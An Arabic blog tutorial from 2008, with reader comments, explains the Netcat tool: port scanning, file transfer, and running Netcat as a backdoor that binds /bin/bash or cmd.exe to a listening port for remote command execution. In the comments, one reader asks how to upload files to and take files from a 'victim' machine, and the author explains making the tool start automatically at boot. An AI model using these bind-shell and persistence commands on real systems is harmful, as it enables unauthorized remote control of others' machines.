شرح أداة Netcat – The Swiss Army Knife
كتب بتاريخ: Jan 22nd, 2008 | بواسطة: عبدالمهيمن
السلام عليكم ورحمة الله وبركاته
Netcat من أفضل الأدوات التي عرفها الـ Hackers تقوم هذه الأداة
بارسال واستقبال البيانات باستعمال الـ TCP & UDP Protocols
وهي بالمرتبة الرابعة في قائمة Top 100 Network Security Tools
استخدامات الـ Netcat متعددة وخطيرة فتستطيع استعمالها لكثير من الأمور منها
فحص المنافذ المفتوحة في السيرفر
تستطيع أداة الـ Netcat فحص المنافذ المفتوحة بالسيرفر ولكن الـ Nmap
أفضل وأسرع منها في ذلك << سأضع شرح لها قريبا ان شاء الله, وللقيام
بهذه العملية نستعمل الأمر
nc -v -w1 SERVER-IP -z FromPort-ToPortأما بالنسبة للخيارات التي استخدمناها
-v لجعل الأداة تعمل بشكل الـ verbose mode أي لرؤية ماذا يحدث
-w لتحديدي الـ Time out لكل اتصال وهنا حددناه ثانية واحدة
-z تستعمل في عملية فحص المنافذ
مثال على ذلك
nc -v -w1 64.233.183.147 -z 1-100ولفحص أكثر من نطاق منافذ نستعمل الأمر
nc -v -w1 -z 64.233.183.147 -z 1-100 400-500ملاحظة: 64.233.183.147 هو IP موقع Google
نقل الملفات بين جهازك والسيرفر
من ميزات الـ Netcat أنها تستطيع نقل الملفات بين جهازين
وللقيام بهذه العملية نطبق الأمر في الجهاز المرسل
nc SERVER-IP PORT < FILEونطبق الأمر في الجهاز المستقبل
nc -l -p PORT > FILEمثال لارسال ملف اسمه data.txt عن طريق البورت 5555 مثلا
nc 192.168.0.45 5555 < data.txtأما بالنسبة لاستقبال ملف data.txt عن طريق المنفذ 5555 ننفذ الأمر
nc -l -p 5555 > data.txtجعل الـ Netcat تعمل كـ Backdoor
هذه أخطر استعمالات الـ Netcat لأنه يشكل خطورة على الجهاز و السيرفر بشكل عام
حيث تمتاز أداة الـ Netcat بخاصية ارسال البيانات الى برنامج معين مثل cmd.exe
في ويندوز و /bin/bash في لينوكس مما يجعلك تستطيع تطبيق أوامر على السيرفر
والتحكم به بشكل كامل يتم تنفيذ هذه الخاصية باستعمال الأمر
nc -l -p PORT -e PROGRAMمع اضافة -d و -L في ويندوز ليصبح الأمر
nc -l -p PORT -d -e PROGRAM -Lمثال على هذه الخاصية نقوم بتطبيق الأمر
nc -l -p 4455 -e /bin/bashعلى السيرفر اذا كان السيرفر ويندوز نطبق نفس الأمر مع اضافة -L و -d مع القيام بتغيير
الـ /bin/bash الى cmd.exe ليصبح الأمر بالشكل
nc -l -p 4455 -e -d cmd.exe -Lوللاتصال بالسيرفر نطبق الأمر
nc -v -n SERVER-IP 4455وبهذه الطريقة نستطيع ارسال أوامر للتحكم بالسيرفر ولمعرفة جميع خصائص هذه الأداة نفذ الأمر
nc -hتحميل أداة Netcat لنظام لينوكس | تحميل أداة Netcat لنظام ويندوز
ان أصبت فمن الله وان أخطأت فمن نفسي ومن الشيطان
أرجو أن ينال الشرح اعجابكم
تحياتي Br4v3-H34r7.
وعليكم السلام
اخوي فعلاً الاداه جميله لكن صعوبتها في الاوامر
لنفرض مثلن اني اخترق جهاز واحد عن طريق الشل كود
وقدرت ادخل جهازه بس عندي مشكله وهي كيف ارفع مثلاً باتش لجهاز الضحيه
وكيف استطيع اخذ ملف من جهازي الضحيه الي جهازي
واخير مثلن ابي اسحب باتش من النت لحهازي الضحيه
ياليت تقولي الاوامر !
ومعليش اذا طولت
أهلا أخي خالد.. لا أجد أي صعوبة بالتعامل مع الأداة و على العكس تماما أوامرها سهلة مقارنة مع غيرها من الأدوات.. بالنسبة لأسئلتك فهي تعتمد على عدة أشياء مثل نظام التشغيل, الاستغلال المستخدم, الصلاحيات و غيرها من الأمور.. استخدامات النت كات موضحة في الموضوع أنصحك بقرائته!
اخوي الغالي اولن مشكور علي هذا البرنامج و الله ما قصرت يا بعد عيني بس عندي سوئل
1- حبي النظام الباك تراك 3 الفاينل يحتوي علي هذا الادات هي نفس عمل هذا الادات الموجود اهني ام يختلف عمل تلك الادات عن هذة ارجو ان فتهمت قصدي و مشكور مرة اخري الغالي علي هذا البرنامج و ان شاء الله نحو الامام و التقدم و تحياتي اليك و الي الجميع
أخي أجل الأداة هي نفسها الموجودة في توزيعة الباك تراك و حسب معرفتي يوجد أداة netcat واحدة لكن تختلف الاصدارات…
أهلا أخي خالد.. لا أجد أي صعوبة بالتعامل مع الأداة و على العكس تماما أوامرها سهلة مقارنة مع غيرها من الأدوات.. بالنسبة لأسئلتك فهي تعتمد على عدة أشياء مثل نظام التشغيل, الاستغلال المستخدم, الصلاحيات و غيرها من الأمور.. استخدامات النت كات موضحة في الموضوع أنصحك بقرائته!
مشكور علي الرد
تفضل اخوي
نظام التشغيل وندوز الاستغلال عن طريق الشل كود الصلاحيات لا اعلم كيف اطلعها
اذا ماعرفت وش الامر الصحيح
ياليت تضع جميع اوامر النت كات لرفع ملف بجميع الصلاحيات
أخي لاظهار جميع أوامر النت كات استخدم آخر أمر مذكور في الشرح! و الأوامر السابقة تشرح بعض استخدامات النت كات. يعني الأوامر أمامك و أنت تقلي أضعها لك,, شيء غريب!!
جمييييل ،، يآبطل ،، اداه جميله من شخص ارووووع ،،
تحيآتي لك
السلام عليك أخي .. أنا عندي البرنامج .. ولكن لا أعرف أين بالضبط يتم تنفيذ هذه الأوامر التي كتبتها .. حيث أنه لا يوجد خانه لكتابة هذه الأوامر .. اعذرني لجهلي.. ولكن إذا كان فيها تعب ممكن شرح مدعم بالصور لهذه الأوامر .. .. اسف للإطالة ولو الشرح موجود مسبقاً يا ريت تنوه بالإشارة لإسم الموضوع لأبحث عنه.. جزاك الله كل خير … ويا ريت لو يكون في شرح عن الشبكات وأوامر الشبكات .. عاوزين نتعلم حاجة مفيدة بقى
How To make it run as a service With windows Machine ?!!
I mean It run after restart The computer ?!!
@SaUdi~Net: تسلم أخي.. ان شاء الله يكون الموضوع نال اعجابك وأهلا بك في المدونة.
@عبد الحميد: وعليكم السلام.. أخي الشرح واضح جدا ولايحتاج لصور لتتعلم كيفية تطبيقه!! كل ماعليك هو تنفيذ هذه الأوامر من الـ cmd اذا كان نظامك Windows مع مراعاة تنفيذ الأمر في نفس مجلد البرنامج أو نسخ الأداة لمجلد system32 الموجود داخل النظام.. تحياتي!
@Offensive: There is a different between run the program as windows service or make it run when windows startup! anyway you can use .bat file and add it to the startup folder or to the registry. please use Arabic language next time!!
الله يوفقك دنيا واخره
والله افضل مدونه رايتهاااااااااااا
السلام عليكم ورحمة الله وبركاته
اولا شكرا اخي على الشرح الوافي والتام
بس عندي سؤال انا حملت الادات تبع الوينداوز ثم وضعتها بsystem32 وعملت امر cmd بس لما اجي اطبق امر nc ياتيني الرد التالي
Access is denied.
رجاءا شرح لكيفية تنزبلها على الجهاز ثم تنصيبها ثم الاتصال اذا انا فاهم استعمالها خطا
وربي يجازيك كل خير
@knari: شكرا أخي على دعواتك الجميلة.. أتمنى أن تكون استفدت من الموضوع وأهلا بك في المدونة.
@DrEaDFuL: وعليكم السلام أخي.. لا تحتاج لتنصيب الأداة ويمكنك استخدامها بشكل مباشر من cmd بعد وجودك بنفس مسار الأداة دون الحاجة لنسخها لمجلد system32 وبالنسبة لرسالة Access is denied لا أعلم ما السبب بصراحة لكن أظن أنك تعمل على النظام بحساب user وليس Administrator! بالتوفيق…
تسلم حبيب قلبي
في إنتظار الشرح